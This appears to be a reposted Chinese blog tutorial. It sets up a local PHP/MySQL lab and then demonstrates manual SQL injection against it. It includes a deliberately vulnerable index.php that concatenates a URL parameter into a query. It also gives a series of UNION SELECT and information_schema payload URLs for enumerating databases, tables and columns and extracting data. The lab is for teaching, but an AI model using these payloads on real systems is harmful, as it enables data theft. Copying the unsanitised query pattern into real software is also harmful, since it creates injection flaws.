[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

时间:2022-07-08 20:30:56

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入"

 

1.“php+mysql+apache”环境搭建

                     文件见附件1。

安装“phpStudy (php5.2) ”

  • 将压缩包解压后,双击“phpStudy(PHP5.2).exe”进行安装

  • [经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 安装结束后,弹出“使用手册”及phpStudy窗体,点击“应用”:

  • [经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 观察到两个指示灯由红色变为绿色,说明“Apache”和“MySQL”已成功启动:

  • [经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

在mysql中新建数据库及表

  • 打开“MySQL管理器”

  • [经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

                    注:mysql的登录名及密码都是“root”。

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 新建数据库、表,并添加记录

  • 点击“SQL编辑器”选项卡,在编辑区域添加如下代码然后选中并执行:

create database student;#创建一个新的数据库,名为 student

use student;

create table class1(id int(20) not null AUTO_INCREMENT primary key,name varchar(20) not null,gender varchar(20),phone varchar(20));#在student数据库中创建新表,名为class1,有4个字段 id、name、gender、phone

#插入3条记录

insert into class1(name,phone,gender) values ('own','13977888888','male');

insert into class1(name,phone,gender) values ('hdh','13667777777','male');

insert into class1(name,phone,gender) values ('ckm','15666666666','female');

#注意:每条语句后都用分号“;”作为结尾

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

执行SQL语句后,左侧导航栏中出现了新创建的数据库“student”。双击“student”后,点击“数据浏览器”选项卡,看到了在表“class1”中添加的3条记录:

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

也可导入sql脚本“class1.sql”来创建数据库、表并添加记录,见附件2。使用时如图导入即可:

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 若导入sql脚本后未看到应该被创建的数据库“student”,点击“视图”选项卡中的“全部刷新”即可:

  • [经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

2.配置含有sql注入点的网页

  • 在phpStudy安装目录下的文件夹“WWW”中新建php网页

                网页文件命名为“index.php”,在文件内添加如下代码:

<?php

$con = mysql_connect("localhost","root","root") or die();#连接数据库

mysql_select_db("student");#选择student数据库

$ID = $_GET['id'];#获取URL中的参数“id”

$sql = "select * from class1 where id=$ID";#构建sql查询语句

/*若为字符型参数,则用 $sql = "select * from class1 where name=‘$name’";

$name左右加上单引号 */

echo "sql语句: ".$sql."<br >";

$res = mysql_query($sql);#执行查询语句

while($rows = mysql_fetch_array($res)){

    echo "姓名: ".$rows['name']."<br >";

     echo "性别: ".$rows['gender']."<br >";

      echo "电话: ".$rows['phone']."<br >";

}

mysql_close($con);

?>

        文件“index.php”见附件3。该php代码意为通过URL所传入的参数“id”的值,构建sql查询语句“select * from class1 where id”,最后输出所返回的记录中的三个字段“name”、“gender”、“phone”。

3.SQL注入

  • 判断是否为sql注入点

    • 整形参数判断

1、URL最后加上 and 1=1

2、URL最后加上 and 1=2

                            如果2异常,1正常就存在注入

                   本文使用的是整形参数,结果如下:     

      and 1=1

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

     and 1=2

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 猜字段数

http://127.0.0.1/?id=1 order by <n>  #注:n是任意数字。若返回页面正常,则该数字为字段数

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 获取数据库名、用户名、数据库版本

http://127.0.0.1/?id=1 union select 1,database(),user(),version()

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 猜解表名

    • 1.mysql版本在5.1后

      • mysql5.1后,设有一个表保存所有数据库下的表名,据此查询获得指定数据库下的表名

使用小葵工具转化数据库名“student”,得到hex值:

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

    “小葵多功能转换工具”见附件4。

将Hex值填到“where table_schema=”后。如是获取了数据库“student”下的表“class1”的表名:

http://127.0.0.1/?id=1 union select 1,table_name,2,3 from information_schema.tables where table_schema=0x73747564656E74

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

2.mysql版本在5.1前时,如何猜解表名

在URL后加入sql语句,返回正常表示存在该表名

<URL> and exists(select * from <所猜解的表名>)

  • 获取指定表的列信息

    • 使用小葵工具转化表名“class1”,得到hex值:

     

  • [经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 将Hex值填到”where table_name=”后。如是获取了表“class1”的列信息。

http://127.0.0.1/?id=1 union select 1,column_name,2,3 from information_schema.columns where table_name=0x636C61737331

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

  • 猜解列名(字段名)

    • 在URL后加入sql语句,返回正常表示存在所猜解的列名

<URL> and exists(select <所猜解的列名> from <表名>)

  • 获取指定列的数据

                例如,获取表“class1”中,列“phone”的数据:

http://127.0.0.1/?id=1 union select 1,phone,2,3 from class1

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

注: 若浏览器访问页面时出现乱码,将浏览器编码设置为“UTF-8”即可解决:

[经验技巧] “php+mysql+apache”环境搭建及"手动SQL注入",20180527-0

============================================